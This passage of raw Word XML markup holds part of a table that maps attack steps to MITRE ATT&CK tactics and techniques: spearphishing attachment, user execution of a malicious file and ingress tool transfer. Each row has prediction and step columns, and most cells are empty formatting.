            <w:shd w:val="clear" w:color="auto" w:fill="FFF2CC" w:themeFill="accent4" w:themeFillTint="33"/>
          </w:tcPr>
          <w:p w14:paraId="79BB7AD1" w14:textId="6AFF465F" w:rsidR="00A307AF" w:rsidRPr="002D1D50" w:rsidRDefault="00A307AF" w:rsidP="00A307AF">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2693" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFF2CC" w:themeFill="accent4" w:themeFillTint="33"/>
          </w:tcPr>
          <w:p w14:paraId="2863AC86" w14:textId="77777777" w:rsidR="00A307AF" w:rsidRPr="002D1D50" w:rsidRDefault="00A307AF" w:rsidP="00A307AF">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00A307AF" w:rsidRPr="002D1D50" w14:paraId="6FFEE2D3" w14:textId="77777777" w:rsidTr="00A307AF">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="440" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="74ACFB68" w14:textId="77777777" w:rsidR="00A307AF" w:rsidRPr="002D1D50" w:rsidRDefault="00A307AF" w:rsidP="00A307AF">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1958" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2B35B8D9" w14:textId="77777777" w:rsidR="00A307AF" w:rsidRPr="002D1D50" w:rsidRDefault="00A307AF" w:rsidP="00A307AF">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2463" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="47011E3F" w14:textId="77777777" w:rsidR="00A307AF" w:rsidRPr="002D1D50" w:rsidRDefault="00A307AF" w:rsidP="00A307AF">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="663" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="10F22052" w14:textId="77777777" w:rsidR="00A307AF" w:rsidRPr="002D1D50" w:rsidRDefault="00A307AF" w:rsidP="00A307AF">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="708" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4AECCA1A" w14:textId="77777777" w:rsidR="00A307AF" w:rsidRPr="002D1D50" w:rsidRDefault="00A307AF" w:rsidP="00A307AF">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="567" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0C55D234" w14:textId="77777777" w:rsidR="00A307AF" w:rsidRPr="002D1D50" w:rsidRDefault="00A307AF" w:rsidP="00A307AF">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="993" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="33CE9D91" w14:textId="00795CE1" w:rsidR="00A307AF" w:rsidRPr="002D1D50" w:rsidRDefault="00A307AF" w:rsidP="00A307AF">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2693" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="187F8ADC" w14:textId="77777777" w:rsidR="00A307AF" w:rsidRPr="002D1D50" w:rsidRDefault="00A307AF" w:rsidP="00A307AF">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00A307AF" w:rsidRPr="002D1D50" w14:paraId="0FBCB0C9" w14:textId="77777777" w:rsidTr="00A307AF">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="440" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2050AEBE" w14:textId="77777777" w:rsidR="00A307AF" w:rsidRPr="002D1D50" w:rsidRDefault="00A307AF" w:rsidP="00A307AF">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>ID</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1958" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="524C6CB0" w14:textId="77777777" w:rsidR="00A307AF" w:rsidRPr="002D1D50" w:rsidRDefault="00A307AF" w:rsidP="00A307AF">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="002D1D50">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>Tactic</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2463" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="58F28895" w14:textId="77777777" w:rsidR="00A307AF" w:rsidRPr="002D1D50" w:rsidRDefault="00A307AF" w:rsidP="00A307AF">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="002D1D50">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>Technique</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="663" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6B6EA480" w14:textId="77777777" w:rsidR="00A307AF" w:rsidRPr="002D1D50" w:rsidRDefault="00A307AF" w:rsidP="00A307AF">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>Pred</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="708" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="20CC132C" w14:textId="228C618E" w:rsidR="00A307AF" w:rsidRPr="002D1D50" w:rsidRDefault="00A307AF" w:rsidP="00A307AF">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>TInc</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="567" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4D16E4E2" w14:textId="6590847D" w:rsidR="00A307AF" w:rsidRPr="002D1D50" w:rsidRDefault="00A307AF" w:rsidP="00A307AF">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>S/G</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="993" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0EA9C3AE" w14:textId="4C79EA8F" w:rsidR="00A307AF" w:rsidRPr="002D1D50" w:rsidRDefault="00A307AF" w:rsidP="00A307AF">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="002D1D50">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>KC Step</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2693" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="21C4A362" w14:textId="77777777" w:rsidR="00A307AF" w:rsidRPr="002D1D50" w:rsidRDefault="00A307AF" w:rsidP="00A307AF">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="002D1D50">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>Notes</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00A307AF" w:rsidRPr="00045888" w14:paraId="3965812E" w14:textId="77777777" w:rsidTr="00A307AF">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="440" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6685924F" w14:textId="77777777" w:rsidR="00A307AF" w:rsidRPr="00045888" w:rsidRDefault="00A307AF" w:rsidP="00A307AF">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00045888">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1958" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2D4ACCBF" w14:textId="77777777" w:rsidR="00A307AF" w:rsidRPr="00045888" w:rsidRDefault="00A307AF" w:rsidP="00A307AF">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00045888">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>TA</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="00045888">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>0001 :</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="00045888">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve"> Initial Access</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2463" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="299D9261" w14:textId="77777777" w:rsidR="00A307AF" w:rsidRPr="00045888" w:rsidRDefault="00A307AF" w:rsidP="00A307AF">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="00045888">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>T1566.001 :</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="00045888">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00045888">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Spearphishing</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00045888">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve"> Attachment</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="663" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1D0568A9" w14:textId="77777777" w:rsidR="00A307AF" w:rsidRPr="00045888" w:rsidRDefault="00A307AF" w:rsidP="00A307AF">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="708" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0DFF89F0" w14:textId="77777777" w:rsidR="00A307AF" w:rsidRPr="00045888" w:rsidRDefault="00A307AF" w:rsidP="00A307AF">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="567" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6C1AC620" w14:textId="74378E0B" w:rsidR="00A307AF" w:rsidRPr="00045888" w:rsidRDefault="00A307AF" w:rsidP="00A307AF">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>S</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="993" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="738CD191" w14:textId="7C4F6C6D" w:rsidR="00A307AF" w:rsidRPr="00045888" w:rsidRDefault="00A307AF" w:rsidP="00A307AF">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2693" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7C508E06" w14:textId="77777777" w:rsidR="00A307AF" w:rsidRPr="00045888" w:rsidRDefault="00A307AF" w:rsidP="00A307AF">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00A307AF" w:rsidRPr="000966C3" w14:paraId="02A59AAF" w14:textId="77777777" w:rsidTr="00A307AF">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="440" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="06198513" w14:textId="77777777" w:rsidR="00A307AF" w:rsidRPr="000966C3" w:rsidRDefault="00A307AF" w:rsidP="00A307AF">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="000966C3">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1958" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1C12E8B2" w14:textId="77777777" w:rsidR="00A307AF" w:rsidRPr="000966C3" w:rsidRDefault="00A307AF" w:rsidP="00A307AF">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="000966C3">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>TA</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="000966C3">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>0002 :</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="000966C3">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve"> Execution</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2463" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1C75B062" w14:textId="77777777" w:rsidR="00A307AF" w:rsidRPr="000966C3" w:rsidRDefault="00A307AF" w:rsidP="00A307AF">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="000966C3">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>T1204.002 :</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="000966C3">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve"> User Execution : Malicious File</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="663" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="69FC7086" w14:textId="77777777" w:rsidR="00A307AF" w:rsidRPr="000966C3" w:rsidRDefault="00A307AF" w:rsidP="00A307AF">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="000966C3">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="708" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="08641CBA" w14:textId="77777777" w:rsidR="00A307AF" w:rsidRPr="000966C3" w:rsidRDefault="00A307AF" w:rsidP="00A307AF">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="567" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7276FD9B" w14:textId="125125A6" w:rsidR="00A307AF" w:rsidRPr="000966C3" w:rsidRDefault="00A307AF" w:rsidP="00A307AF">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>S</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="993" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1475A51E" w14:textId="104A2B19" w:rsidR="00A307AF" w:rsidRPr="000966C3" w:rsidRDefault="00A307AF" w:rsidP="00A307AF">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2693" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="004C1A9D" w14:textId="00D4B2A1" w:rsidR="00A307AF" w:rsidRPr="000966C3" w:rsidRDefault="00A307AF" w:rsidP="00A307AF">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00A307AF" w:rsidRPr="00B857D7" w14:paraId="78EE5FDD" w14:textId="77777777" w:rsidTr="00A307AF">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="440" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="262BCE0B" w14:textId="77777777" w:rsidR="00A307AF" w:rsidRPr="00B857D7" w:rsidRDefault="00A307AF" w:rsidP="00A307AF">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>3</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1958" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="798C531F"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175DD618"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663" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="05EB2253" w14:textId="77777777" w:rsidR="00A307AF" w:rsidRPr="00B857D7" w:rsidRDefault="00A307AF" w:rsidP="00A307AF">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="708" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7A14876C" w14:textId="77777777" w:rsidR="00A307AF" w:rsidRPr="00B857D7" w:rsidRDefault="00A307AF" w:rsidP="00A307AF">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="567" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1D103D63" w14:textId="4E1E0947"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28908832" w14:textId="4620F99B" w:rsidR="00A307AF" w:rsidRPr="00B857D7" w:rsidRDefault="00A307AF" w:rsidP="00A307AF">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2693" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4BC5A8ED" w14:textId="4C4D5D29" w:rsidR="00A307AF" w:rsidRPr="00B857D7" w:rsidRDefault="00A307AF" w:rsidP="00A307AF">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00A307AF" w:rsidRPr="009355DB" w14:paraId="61D53B35" w14:textId="77777777" w:rsidTr="00A307AF">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="440" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="624C12E9" w14:textId="3288F3CC" w:rsidR="00A307AF" w:rsidRPr="009355DB" w:rsidRDefault="00A307AF" w:rsidP="00A307AF">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="009355DB">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>4</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1958" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1B7E66FD" w14:textId="77777777" w:rsidR="00A307AF" w:rsidRPr="009355DB" w:rsidRDefault="00A307AF" w:rsidP="00A307AF">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="009355DB">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>TA</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="009355DB">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>0011 :</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="009355DB">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t xml:space="preserve"> Command &amp; Control</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2463" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5B41B26E" w14:textId="77777777" w:rsidR="00A307AF" w:rsidRPr="009355DB" w:rsidRDefault="00A307AF" w:rsidP="00A307AF">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="009355DB">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>T1105 Ingress Tool Transfer</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="663" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0266FA7C" w14:textId="0E604BA8" w:rsidR="00A307AF" w:rsidRPr="009355DB" w:rsidRDefault="00A307AF" w:rsidP="00A307AF">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>3</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
